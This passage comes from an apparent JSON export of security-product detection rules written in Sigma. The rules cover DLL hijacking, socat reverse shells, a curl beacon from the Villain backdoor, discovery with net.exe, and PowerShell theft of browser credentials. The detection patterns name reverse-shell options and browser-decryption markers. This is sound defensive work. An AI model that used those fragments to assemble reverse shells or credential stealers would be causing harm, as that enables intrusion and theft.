'?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c25909aa-c7f1-4d63-a951-d7e1057f35c8",
"rule_name": "DLL Hijacking via deviceenroller.exe",
"rule_description": "Detects potential Windows DLL Hijacking via deviceenroller.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c29f3873-fe52-4a98-9051-07faf06bd8b7",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.089090Z",
"creation_date": "2026-03-23T11:45:34.089093Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.089097Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://book.hacktricks.xyz/generic-methodologies-and-resources/shells/linux",
"https://gtfobins.github.io/gtfobins/socat/",
"https://attack.mitre.org/techniques/T1059/004/"
],
"name": "t1059_004_reverse_shell_socat_linux.yml",
"content": "title: Reverse Shell Executed via Socat\nid: c29f3873-fe52-4a98-9051-07faf06bd8b7\ndescription: |\n Detects different suspicious usages of Socat that are related to reverse shells.\n A reverse shell is a shell session that is initiated from the victim's machine towards the attacker's.\n Attackers often use reverse shells to bypass firewall restrictions.\n It is recommended to investigate remote network connections made by socat, as well as the command-line and the execution context to determine if this action was legitimate.\nreferences:\n - https://book.hacktricks.xyz/generic-methodologies-and-resources/shells/linux\n - https://gtfobins.github.io/gtfobins/socat/\n - https://attack.mitre.org/techniques/T1059/004/\ndate: 2022/07/01\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.004\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.LOLBin.Socat\n - classification.Linux.Behavior.RemoteShell\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection_protocol:\n CommandLine|contains:\n - 'TCP:'\n - 'TCP4:'\n - 'TCP6:'\n - 'TCP-CONNECT:'\n - 'TCP4-CONNECT:'\n - 'TCP6-CONNECT:'\n - 'UDP:'\n - 'UDP4:'\n - 'UDP6:'\n - 'UDP-CONNECT:'\n - 'UDP4-CONNECT:'\n - 'UDP6-CONNECT:'\n selection_command:\n CommandLine|contains|all:\n - 'EXEC:'\n - 'pty'\n - 'stderr'\n\n condition: all of selection_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c29f3873-fe52-4a98-9051-07faf06bd8b7",
"rule_name": "Reverse Shell Executed via Socat",
"rule_description": "Detects different suspicious usages of Socat that are related to reverse shells.\nA reverse shell is a shell session that is initiated from the victim's machine towards the attacker's.\nAttackers often use reverse shells to bypass firewall restrictions.\nIt is recommended to investigate remote network connections made by socat, as well as the command-line and the execution context to determine if this action was legitimate.\n",
"rule_creation_date": "2022-07-01",
"rule_modified_date": "2025-04-14",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.004"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c29f3873-fe52-4a98-9051-07fafddf1237",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.089376Z",
"creation_date": "2026-03-23T11:45:34.089379Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.089384Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://book.hacktricks.xyz/generic-methodologies-and-resources/shells/linux",
"https://github.com/t3l3machus/Villain",
"https://attack.mitre.org/techniques/T1059/004/"
],
"name": "t1059_004_backdoor_villain.yml",
"content": "title: Suspicious Curl Execution Related to Villain Backdoor\nid: c29f3873-fe52-4a98-9051-07fafddf1237\ndescription: |\n Detects a suspicious curl execution that may be related to the Villain framework's backdoor.\n This backdoor allows users to instantiate reverse shells on the victim's computer and communcate with other \"sibling machines\" (machines infected by Villain) in the network.\n Attackers often use reverse shells to bypass firewall restrictions.\n It is recommended to investigate this curl command and to block connections to the target IP in the command-line. If the IP is local to your network you may correlate it with other alerts to determine compromised endpoints in your network.\nreferences:\n - https://book.hacktricks.xyz/generic-methodologies-and-resources/shells/linux\n - https://github.com/t3l3machus/Villain\n - https://attack.mitre.org/techniques/T1059/004/\ndate: 2022/12/06\nmodified: 2025/02/13\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.004\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Framework.Villain\n - classification.Linux.Behavior.CommandAndControl\n - classification.Linux.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image|endswith: '/curl'\n CommandLine: 'curl -s http://*.*.*.*:*/????????/*/* -H Authorization: ????????-????????-???????? -o /dev/null'\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c29f3873-fe52-4a98-9051-07fafddf1237",
"rule_name": "Suspicious Curl Execution Related to Villain Backdoor",
"rule_description": "Detects a suspicious curl execution that may be related to the Villain framework's backdoor.\nThis backdoor allows users to instantiate reverse shells on the victim's computer and communcate with other \"sibling machines\" (machines infected by Villain) in the network.\nAttackers often use reverse shells to bypass firewall restrictions.\nIt is recommended to investigate this curl command and to block connections to the target IP in the command-line. If the IP is local to your network you may correlate it with other alerts to determine compromised endpoints in your network.\n",
"rule_creation_date": "2022-12-06",
"rule_modified_date": "2025-02-13",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.004"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c2a9ecc2-ad4c-41d3-8eed-baa411f1c978",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.621375Z",
"creation_date": "2026-03-23T11:45:34.621377Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.621381Z",
"rule_level": "low",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1087/001/"
],
"name": "t1087_001_net_user_local.yml",
"content": "title: Local User List Discovered\nid: c2a9ecc2-ad4c-41d3-8eed-baa411f1c978\ndescription: |\n Detects the execution of the net command to discover users.\n This command is often used attackers during the discovery phase to gather the list of local users.\n It is recommended to check the process' parent for other suspicious actions.\nreferences:\n - https://attack.mitre.org/techniques/T1087/001/\ndate: 2021/04/28\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1087.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n - Image|endswith: '\\net1.exe'\n # Renamed binaries\n - OriginalFileName: 'net1.exe'\n\n selection_cmd:\n CommandLine|contains: ' user'\n\n # This is handled by another rule\n filter_cmd:\n CommandLine|contains:\n - '/domain'\n - '\\domain'\n - '/add'\n - '\\add'\n - '/delete'\n - '/del'\n - '\\delete'\n - '/ACTIVE'\n - '\\ACTIVE'\n\n exclusion_programfiles:\n GrandparentImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n exclusion_template_gpscript:\n ProcessAncestors|contains: '?:\\Windows\\System32\\gpscript.exe|?:\\Windows\\System32\\svchost.exe'\n\n exclusion_ancestors:\n ProcessAncestors|contains:\n - '?:\\Program Files\\NSClient++\\nscp.exe'\n - '?:\\Program Files (x86)\\\\*\\winpty-agent.exe'\n - '?:\\Program Files (x86)\\CyberCNSAgent\\cybercnsagent.exe'\n - '?:\\Windows\\AdminArsenal\\PDQDeployRunner\\service-?\\PDQDeployRunner-?.exe'\n - '?:\\Program Files\\BMC Software\\BladeLogic\\RSC\\RSCD.exe'\n - '?:\\Program Files (x86)\\Ivanti\\Workspace Control\\pfwsmgr.exe'\n - '?:\\Program Files\\Siemens\\syngo\\bin\\syngo.Common.Starter.exe'\n - '?:\\Program Files\\Quest\\KACE\\KDeploy.exe'\n - '?:\\Program Files (x86)\\wapt\\wapt-get.exe'\n - '?:\\Program Files\\pandora_agent\\util\\pandora_hardening.exe'\n\n exclusion_ivanti:\n # LANDESK Shavlik Protect Agent\n CommandLine: '?:\\windows\\system32\\net1 user administrator'\n GrandparentCommandLine: '?:\\windows\\system32\\cmd.exe /c net user administrator | findstr /C:Account active 2>>?:\\STscript\\Trace.txt'\n\n exclusion_kiosk:\n CommandLine: '?:\\windows\\system32\\net1 user kiosk 1364146620'\n GrandparentImage: '?:\\Windows\\System32\\LogonUI.exe'\n\n exclusion_connectwise:\n ParentImage: '?:\\Windows\\LTSvc\\LTSVC.exe'\n ProcessParentSigned: 'true'\n ProcessParentSignature: 'Connectwise, LLC'\n\n exclusion_archimed:\n GrandparentCommandLine: '?:\\Windows\\Microsoft.NET\\Framework\\v*\\installutil.exe /i ArchimedUpdater.exe'\n\n exclusion_schedule:\n ProcessParentGrandparentCommandLine: '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p -s Schedule'\n\n condition: all of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: low\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c2a9ecc2-ad4c-41d3-8eed-baa411f1c978",
"rule_name": "Local User List Discovered",
"rule_description": "Detects the execution of the net command to discover users.\nThis command is often used attackers during the discovery phase to gather the list of local users.\nIt is recommended to check the process' parent for other suspicious actions.\n",
"rule_creation_date": "2021-04-28",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1087.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c2bb32cf-f1c3-400b-8a28-fd5910538098",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.602791Z",
"creation_date": "2026-03-23T11:45:34.602794Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.602802Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_wermgr.yml",
"content": "title: DLL Hijacking via wermgr.exe\nid: c2bb32cf-f1c3-400b-8a28-fd5910538098\ndescription: |\n Detects potential Windows DLL Hijacking via wermgr.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'wermgr.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\wer.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c2bb32cf-f1c3-400b-8a28-fd5910538098",
"rule_name": "DLL Hijacking via wermgr.exe",
"rule_description": "Detects potential Windows DLL Hijacking via wermgr.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c2ebbac9-31dc-4e9c-abb3-40df63d524a2",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.086076Z",
"creation_date": "2026-03-23T11:45:34.086078Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.086082Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.sentinelone.com/labs/follow-the-smoke-china-nexus-threat-actors-hammer-at-the-doors-of-top-tier-targets/",
"https://attack.mitre.org/techniques/T1055/"
],
"name": "t1055_dll_injection_via_remote_debugging.yml",
"content": "title: Possible DLL Injected via Remote Debugging\nid: c2ebbac9-31dc-4e9c-abb3-40df63d524a2\ndescription: |\n Detects the suspicious loading of a DLL in a process with a stacktrace indicating debugging activity.\n Attackers may try to inject malicious code into a remote process to evade process based defenses.\n It is recommended to analyze the behavior of both the parent and child processes to look for malicious actions or content.\nreferences:\n - https://www.sentinelone.com/labs/follow-the-smoke-china-nexus-threat-actors-hammer-at-the-doors-of-top-tier-targets/\n - https://attack.mitre.org/techniques/T1055/\ndate: 2025/08/25\nmodified: 2025/08/28\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.privilege_escalation\n - attack.t1055.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.ProcessInjection\n - classification.Windows.Behavior.MemoryExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n StackTrace|startswith: '?:\\Windows\\System32\\ntdll.dll!DbgUiRemoteBreakin'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c2ebbac9-31dc-4e9c-abb3-40df63d524a2",
"rule_name": "Possible DLL Injected via Remote Debugging",
"rule_description": "Detects the suspicious loading of a DLL in a process with a stacktrace indicating debugging activity.\nAttackers may try to inject malicious code into a remote process to evade process based defenses.\nIt is recommended to analyze the behavior of both the parent and child processes to look for malicious actions or content.\n",
"rule_creation_date": "2025-08-25",
"rule_modified_date": "2025-08-28",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1055.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c31922b9-cce9-40eb-84c9-1670f46cdbe5",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.611503Z",
"creation_date": "2026-03-23T11:45:34.611506Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.611514Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://medium.com/cyberscribers-exploring-cybersecurity/apt28-from-initial-damage-to-domain-controller-threats-in-an-hour-cert-ua-8399-1944dd6edcdf",
"https://www.magnetforensics.com/blog/infostealer-malware-what-is-it-and-how-to-investigate/",
"https://e.cyberint.com/hubfs/Cyberint%20Info%20Stealers%20Overview.pdf",
"https://attack.mitre.org/techniques/T1005/",
"https://attack.mitre.org/techniques/T1059/001/"
],
"name": "t1005_pwsh_browser_data_accessed.yml",
"content": "title: Suspicious Browser Data Read via PowerShell\nid: c31922b9-cce9-40eb-84c9-1670f46cdbe5\ndescription: |\n Detects a suspicious PowerShell script with the capacity to read and decrypt browser data files.\n This may be an indicator of a stealer opening the User Data folder of a given browser to exfiltrate credentials or other artifacts.\n It is recommended to investigate the context of this action to determine its legitimacy.\n If you assume this to be a breach, it is recommended to perform an investigation to determine what information has been exfiltrated and change the credentials of the affected users.\n Further information about different stealers and scripts is present in the references.\nreferences:\n - https://medium.com/cyberscribers-exploring-cybersecurity/apt28-from-initial-damage-to-domain-controller-threats-in-an-hour-cert-ua-8399-1944dd6edcdf\n - https://www.magnetforensics.com/blog/infostealer-malware-what-is-it-and-how-to-investigate/\n - https://e.cyberint.com/hubfs/Cyberint%20Info%20Stealers%20Overview.pdf\n - https://attack.mitre.org/techniques/T1005/\n - https://attack.mitre.org/techniques/T1059/001/\ndate: 2024/01/09\nmodified: 2025/03/31\nauthor: HarfangLab\ntags:\n - attack.collection\n - attack.t1005\n - attack.t1185\n - attack.discovery\n - attack.t1217\n - attack.privilege_escalation\n - attack.t1555.003\n - attack.execution\n - attack.t1059.001\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Stealer.Generic\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.SensitiveInformation\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection_chromium:\n PowershellCommand|contains|all:\n - 'os_crypt.encrypted_key' # Encrypted key in Local State .json\n - 'AppData\\Local\\\\*\\User Data' # Login Data location\n\n selection_firefox:\n PowershellCommand|contains|all:\n - '\\Profiles' # key3.db|key4.db location for use with NSS\n - 'encryptedPassword' # logins.json field\n - 'PK11SDR_Decrypt' # nss3.dll decryption function\n\n condition: 1 of selection_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c31922b9-cce9-40eb-84c9-1670f46cdbe5",
"rule_name": "Suspicious Browser Data Read via PowerShell",
"rule_description": "Detects a suspicious PowerShell script with the capacity to read and decrypt browser data files.\nThis may be an indicator of a stealer opening the User Data folder of a given browser to exfiltrate credentials or other artifacts.\nIt is recommended to investigate the context of this action to determine its legitimacy.\nIf you assume this to be a breach, it is recommended to perform an investigation to determine what information has been exfiltrated and change the credentials of the affected users.\nFurther information about different stealers and scripts is present in the references.\n",
"rule_creation_date": "2024-01-09",
"rule_modified_date": "2025-03-31",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.collection",
"attack.discovery",
"attack.execution",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1005",
"attack.t1059.001",
"attack.t1185",
"attack.t1217",
"attack.t1555.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c36093ec-d58a-4550-a890-21bcfcf9011f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.603062Z",
"creation_date": "2026-03-23T11:45:34.603066Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.603073Z",
"rule_level": "low",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://ss64.com/nt/net-config.html",
"https://attack.mitre.org/techniques/T1016/"
],
"name": "t1016_net_config_workstation.yml",
"content": "title: Workstation Service Configuration Enumerated via net.exe\nid: c36093ec-d58a-4550-a890-21bcfcf9011f\ndescription: |\n Detects the execution of net command to display various information about the host.\n This command is especially used to display information about the local workstation such as current user or computer name.\n Attackers can use this program to perform discovery.\n It is recommended to investigate the parent process for other suspicious behaviors.\nreferences:\n - https://ss64.com/nt/net-config.html\n - https://attack.mitre.org/techniques/T1016/\ndate: 2024/02/22\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1016\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n OriginalFileName: 'net1.exe'\n CommandLine|contains: ' config work'\n\n exclusion_swift:\n GrandparentImage: '?:\\Program Files\\SWIFT\\Swift Token Client\\checkhost\\scripts\\perl.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: low\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c36093ec-d58a-4550-a890-21bcfcf9011f",
"rule_name": "Workstation Service Configuration Enumerated via net.exe",
"rule_description": "Detects the execution of net command to display various information about the host.\nThis command is especially used to display information about the local workstation such as current user or computer name.\nAttackers can use this program to perform discovery.\nIt is recommended to investigate the parent process for other suspicious behaviors.\n",
"rule_creation_date": "2024-02-22",
"rule_modified_date": "2025-04-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1016"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c3fe1e99-e4f4-4e8e-b7c7-b3003eee67e7",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.624934Z",
"creation_date": "2026-03-23T11:45:34.624936Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.624940Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.cybereason.com/blog/behind-closed-doors-the-rise-of-hidden-malicious-remote-access",
"https://attack.mitre.org/techniques/T1055/"
],
"name": "t1055_sacrificial_process_cvtres.yml",
"content": "title: Cvtres.exe Sacrificial Process Spawned\nid: c3fe1e99-e4f4-4e8e-b7c7-b3003eee67e7\ndescription: |\n Detects the suspicious execution of the legitimate cvtres.exe Windows binary, spawned without arguments. This can mean that the binary is being used as sacrificial process.\n Such processes are spawned and malicious code is immediately injected into them for nefarious purposes.\n It is recommended to investigate the parent process performing this action and the destination IP address of the cvtres.exe process to determine the legitimacy of this behavior.\nreferences:\n - https://www.cybereason.com/blog/behind-closed-doors-the-rise-of-hidden-malicious-remote-access\n - https://attack.mitre.org/techniques/T1055/\ndate: 2025/11/12\nmodified: 2025/12/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.privilege_escalation\n - attack.t1055\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.SacrificialProcess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n Image|endswith: '\\cvtres.exe'\n\n filter_cmd:\n CommandLine|contains: ' '\n\n filter_winsxs:\n Image:\n - '?:\\Windows\\WinSxS\\x86_*-cvtres_*\\cvtres.exe'\n - '?:\\Windows\\WinSxS\\amd64_*-cvtres_*\\cvtres.exe'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c3fe1e99-e4f4-4e8e-b7c7-b3003eee67e7",
"rule_name": "Cvtres.exe Sacrificial Process Spawned",
